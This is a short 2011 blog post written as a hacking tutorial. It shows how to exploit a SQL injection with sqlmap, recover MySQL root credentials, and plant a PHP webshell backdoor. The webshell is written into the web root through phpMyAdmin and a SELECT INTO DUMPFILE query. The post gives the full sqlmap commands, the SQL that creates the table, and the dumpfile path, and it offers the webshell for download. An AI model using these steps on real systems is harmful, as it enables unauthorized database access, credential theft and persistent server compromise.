Minggu, 24 Juli 2011

Automatic Sql injection and Database Take Over tool

Hey... today i will show you how to generate a simple backdoor using sql injection technique by using sqlmap tool.
once I was found a web application that vulnerable of sql injection attack. the target url like this "192.168.56.2/coba/index.php?id=1" a simple testing I tried to insert character " ' " on the parameter id the result url like this 192.168.56.2/coba/index.php?id='1 it has a error like below :
"the result cant be found because,..You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1' at line 1" it means that this target is vulnerable and possible to be exploit by using sqlmap.
sqlmap is one of several tools that using for sql injection attack..
open the sqlmap then I tried write this syntax :

#./sqlmap.py -u "192.168.56.2/coba/index.php?id=1" and the result like picture at below :

you can see that parameter id is vulnerable and its possible to exploit, next you can use any syntax for your requirement. you can see what are database on the server by using syntax --dbs abd --tables for see tables on the one database..
I will show you by using syntax --password to crack the mysql password the sintax like this :
#./sqlmap.py -u "192.168.56.2/coba/index.php?id=1" --password the result on below :

now we can see the password is "root" and user "root"
then go the page for phpmyadmin and insert these user and password after successfully create one database for our  webshell backdoor the way is like this:

CREATE DATABASE `db_hack` ;
CREATE TABLE `tb_hack` (
`webhack` LONGTEXT NOT NULL
) ENGINE = MYISAM ;


after created database and table..insert the field a simple webshell script
 then use sql syntax for dump file to a target directory.. the sintax like this :

"select * into dumpfile 'C:/AppServ/www/AppServ/ChangeLog.php' from tb_hack"

you can use tools like dirbuster to she directory structure and the result at below :

 the url of my webshell backdoor is http://192.168.56.2/appserv/ChangeLog.php.
the result like this picture

download  webshell: Here
at this webshell you can execute many command and upload file or query the database using the password that you have got...

note : this is just a simple techniques  to generate backdoor using sql injection attack..still many ways more powerful then the way I describe at above...

..waiting for next post...    
thanks for reading...

 
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)